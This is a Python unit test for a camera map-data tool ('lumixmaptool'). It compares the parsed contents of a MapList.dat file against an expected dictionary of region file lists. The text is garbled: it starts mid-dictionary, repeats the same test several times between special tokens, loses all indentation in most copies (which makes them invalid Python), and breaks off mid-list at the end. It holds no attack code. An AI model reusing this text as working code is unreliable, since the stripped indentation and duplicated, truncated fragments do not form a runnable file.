'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',
'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [
'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [
'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',
'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',
'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',
'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',
'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',
'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',
'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',
'POI/P0000053.DFT', 'POI/P0000054.DFT']}}
nose.tools.assert_equal(result, expected)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_parser_test():
"""Check if the evaluation model returns a parser object."""
copy.get_parser()
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, 'misc')
maplistdata_path = os.path.join(misc_folder, 'MapList.dat')
result = copy.parse_mapdata(maplistdata_path)
expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',
'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',
'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',
'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [
'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',
'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',
'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',
'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',
'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',
'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',
'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',
'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [
'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',
'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',
'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',
'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',
'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',
'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',
'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',
'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',
'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',
'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',
'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',
'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',
'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',
'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',
'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',
'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',
'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',
'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',
'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',
'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',
'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',
'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',
'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',
'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',
'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',
'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',
'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',
'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',
'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',
'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',
'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',
'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [
'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [
'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',
'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',
'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',
'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',
'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',
'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',
'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',
'POI/P0000053.DFT', 'POI/P0000054.DFT']}}
nose.tools.assert_equal(result, expected)
<|reserved_special_token_1|>
import os
import nose
import lumixmaptool.copy as copy
def get_parser_test():
"""Check if the evaluation model returns a parser object."""
copy.get_parser()
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, 'misc')
maplistdata_path = os.path.join(misc_folder, 'MapList.dat')
result = copy.parse_mapdata(maplistdata_path)
expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',
'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',
'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',
'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [
'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',
'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',
'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',
'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',
'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',
'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',
'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',
'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [
'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',
'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',
'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',
'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',
'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',
'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',
'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',
'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',
'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',
'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',
'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',
'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',
'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',
'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',
'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',
'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',
'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',
'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',
'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',
'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',
'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',
'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',
'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',
'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',
'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',
'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',
'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',
'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',
'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',
'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',
'POI/P0000011.DFT', 'POI/P0000012.DFT', 'POI/P0000013.DFT',
'POI/P0000020.DFT', 'POI/P0000021.DFT', 'POI/P0000022.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT'], (6): [
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (7): [
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'POI/P0000032.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT'], (8): [
'BACK/B0000031.DFT', 'BACK/B0000032.DFT', 'BACK/B0000033.DFT',
'BACK/B0000040.DFT', 'BACK/B0000041.DFT', 'BACK/B0000042.DFT',
'BACK/B0000049.DFT', 'BACK/B0000050.DFT', 'BACK/B0000051.DFT',
'NAME/N0000031.DFT', 'NAME/N0000032.DFT', 'NAME/N0000033.DFT',
'NAME/N0000040.DFT', 'NAME/N0000041.DFT', 'NAME/N0000042.DFT',
'NAME/N0000049.DFT', 'NAME/N0000050.DFT', 'NAME/N0000051.DFT',
'POI/P0000031.DFT', 'POI/P0000032.DFT', 'POI/P0000033.DFT',
'POI/P0000040.DFT', 'POI/P0000041.DFT', 'POI/P0000042.DFT',
'POI/P0000049.DFT', 'POI/P0000050.DFT', 'POI/P0000051.DFT'], (9): [
'BACK/B0000005.DFT', 'BACK/B0000006.DFT', 'BACK/B0000007.DFT',
'BACK/B0000014.DFT', 'BACK/B0000015.DFT', 'BACK/B0000016.DFT',
'BACK/B0000023.DFT', 'BACK/B0000024.DFT', 'BACK/B0000025.DFT',
'BACK/B0000032.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'NAME/N0000005.DFT', 'NAME/N0000006.DFT', 'NAME/N0000007.DFT',
'NAME/N0000014.DFT', 'NAME/N0000015.DFT', 'NAME/N0000016.DFT',
'NAME/N0000023.DFT', 'NAME/N0000024.DFT', 'NAME/N0000025.DFT',
'NAME/N0000032.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'POI/P0000014.DFT', 'POI/P0000015.DFT', 'POI/P0000023.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000032.DFT',
'POI/P0000033.DFT', 'POI/P0000034.DFT', 'POI/P0000041.DFT',
'POI/P0000042.DFT', 'POI/P0000043.DFT'], (10): ['BACK/B0000037.DFT',
'BACK/B0000041.DFT', 'BACK/B0000042.DFT', 'BACK/B0000043.DFT',
'BACK/B0000044.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000050.DFT', 'BACK/B0000051.DFT', 'BACK/B0000052.DFT',
'BACK/B0000053.DFT', 'BACK/B0000054.DFT', 'NAME/N0000037.DFT',
'NAME/N0000041.DFT', 'NAME/N0000042.DFT', 'NAME/N0000043.DFT',
'NAME/N0000044.DFT', 'NAME/N0000045.DFT', 'NAME/N0000046.DFT',
'NAME/N0000050.DFT', 'NAME/N0000051.DFT', 'NAME/N0000052.DFT',
'NAME/N0000053.DFT', 'NAME/N0000054.DFT', 'POI/P0000037.DFT',
'POI/P0000041.DFT', 'POI/P0000042.DFT', 'POI/P0000043.DFT',
'POI/P0000044.DFT', 'POI/P0000045.DFT', 'POI/P0000046.DFT',
'POI/P0000050.DFT', 'POI/P0000051.DFT', 'POI/P0000052.DFT',
'POI/P0000053.DFT', 'POI/P0000054.DFT']}}
nose.tools.assert_equal(result, expected)
<|reserved_special_token_1|>
#!/usr/bin/env python
# Core Library modules
import os
# Third party modules
import nose
# First party modules
import lumixmaptool.copy as copy
# Tests
def get_parser_test():
"""Check if the evaluation model returns a parser object."""
copy.get_parser()
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, "misc")
maplistdata_path = os.path.join(misc_folder, "MapList.dat")
result = copy.parse_mapdata(maplistdata_path)
expected = {
"num1": "00010001",
"num2": "00010001",
"regions": {
1: [
"BACK/B0000035.DFT",
"BACK/B0000036.DFT",
"BACK/B0000044.DFT",
"BACK/B0000045.DFT",
"BACK/B0000053.DFT",
"BACK/B0000054.DFT",
"NAME/N0000035.DFT",
"NAME/N0000036.DFT",
"NAME/N0000044.DFT",
"NAME/N0000045.DFT",
"NAME/N0000053.DFT",
"NAME/N0000054.DFT",
"POI/P0000035.DFT",
"POI/P0000036.DFT",
"POI/P0000044.DFT",
"POI/P0000045.DFT",
"POI/P0000053.DFT",
"POI/P0000054.DFT",
],
2: [
"BACK/B0000024.DFT",
"BACK/B0000025.DFT",
"BACK/B0000026.DFT",
"BACK/B0000027.DFT",
"BACK/B0000033.DFT",
"BACK/B0000034.DFT",
"BACK/B0000035.DFT",
"BACK/B0000036.DFT",
"BACK/B0000042.DFT",
"BACK/B0000043.DFT",
"BACK/B0000044.DFT",
"BACK/B0000045.DFT",
"NAME/N0000024.DFT",
"NAME/N0000025.DFT",
"NAME/N0000026.DFT",
"NAME/N0000027.DFT",
"NAME/N0000033.DFT",
"NAME/N0000034.DFT",
"NAME/N0000035.DFT",
"NAME/N0000036.DFT",
"NAME/N0000042.DFT",
"NAME/N0000043.DFT",
"NAME/N0000044.DFT",
"NAME/N0000045.DFT",
"POI/P0000024.DFT",
"POI/P0000025.DFT",
"POI/P0000026.DFT",
"POI/P0000027.DFT",
"POI/P0000033.DFT",
"POI/P0000034.DFT",
"POI/P0000035.DFT",
"POI/P0000036.DFT",
"POI/P0000042.DFT",
"POI/P0000043.DFT",
"POI/P0000044.DFT",
"POI/P0000045.DFT",
],
3: [
"BACK/B0000001.DFT",
"BACK/B0000008.DFT",
"BACK/B0000009.DFT",
"BACK/B0000010.DFT",
"BACK/B0000017.DFT",
"BACK/B0000018.DFT",
"BACK/B0000019.DFT",
"BACK/B0000026.DFT",
"BACK/B0000027.DFT",
"NAME/N0000001.DFT",
"NAME/N0000008.DFT",
"NAME/N0000009.DFT",
"NAME/N0000010.DFT",
"NAME/N0000017.DFT",
"NAME/N0000018.DFT",
"NAME/N0000019.DFT",
"NAME/N0000026.DFT",
"NAME/N0000027.DFT",
"POI/P0000017.DFT",
"POI/P0000018.DFT",
"POI/P0000019.DFT",
"POI/P0000026.DFT",
"POI/P0000027.DFT",
],
4: [
"BACK/B0000019.DFT",
"BACK/B0000020.DFT",
"BACK/B0000021.DFT",
"BACK/B0000022.DFT",
"BACK/B0000027.DFT",
"BACK/B0000028.DFT",
"BACK/B0000029.DFT",
"BACK/B0000030.DFT",
"BACK/B0000031.DFT",
"BACK/B0000036.DFT",
"BACK/B0000037.DFT",
"BACK/B0000038.DFT",
"BACK/B0000039.DFT",
"BACK/B0000040.DFT",
"BACK/B0000045.DFT",
"BACK/B0000046.DFT",
"BACK/B0000047.DFT",
"BACK/B0000048.DFT",
"BACK/B0000049.DFT",
"BACK/B0000054.DFT",
"NAME/N0000019.DFT",
"NAME/N0000020.DFT",
"NAME/N0000021.DFT",
"NAME/N0000022.DFT",
"NAME/N0000027.DFT",
"NAME/N0000028.DFT",
"NAME/N0000029.DFT",
"NAME/N0000030.DFT",
"NAME/N0000031.DFT",
"NAME/N0000036.DFT",
"NAME/N0000037.DFT",
"NAME/N0000038.DFT",
"NAME/N0000039.DFT",
"NAME/N0000040.DFT",
"NAME/N0000045.DFT",
"NAME/N0000046.DFT",
"NAME/N0000047.DFT",
"NAME/N0000048.DFT",
"NAME/N0000049.DFT",
"NAME/N0000054.DFT",
"POI/P0000019.DFT",
"POI/P0000020.DFT",
"POI/P0000021.DFT",
"POI/P0000022.DFT",
"POI/P0000027.DFT",
"POI/P0000028.DFT",
"POI/P0000029.DFT",
"POI/P0000030.DFT",
"POI/P0000031.DFT",
"POI/P0000036.DFT",
"POI/P0000037.DFT",
"POI/P0000038.DFT",
"POI/P0000039.DFT",
"POI/P0000040.DFT",
"POI/P0000045.DFT",
"POI/P0000046.DFT",
"POI/P0000047.DFT",
"POI/P0000048.DFT",
"POI/P0000049.DFT",
"POI/P0000054.DFT",
],
5: [
"BACK/B0000002.DFT",
"BACK/B0000003.DFT",
"BACK/B0000004.DFT",
"BACK/B0000011.DFT",
"BACK/B0000012.DFT",
"BACK/B0000013.DFT",
"BACK/B0000020.DFT",
"BACK/B0000021.DFT",
"BACK/B0000022.DFT",
"BACK/B0000029.DFT",
"BACK/B0000030.DFT",
"BACK/B0000031.DFT",
"NAME/N0000002.DFT",
"NAME/N0000003.DFT",
"NAME/N0000004.DFT",
"NAME/N0000011.DFT",
"NAME/N0000012.DFT",
"NAME/N0000013.DFT",
"NAME/N0000020.DFT",
"NAME/N0000021.DFT",
"NAME/N0000022.DFT",
"NAME/N0000029.DFT",
"NAME/N0000030.DFT",
"NAME/N0000031.DFT",
"POI/P0000003.DFT",
"POI/P0000011.DFT",
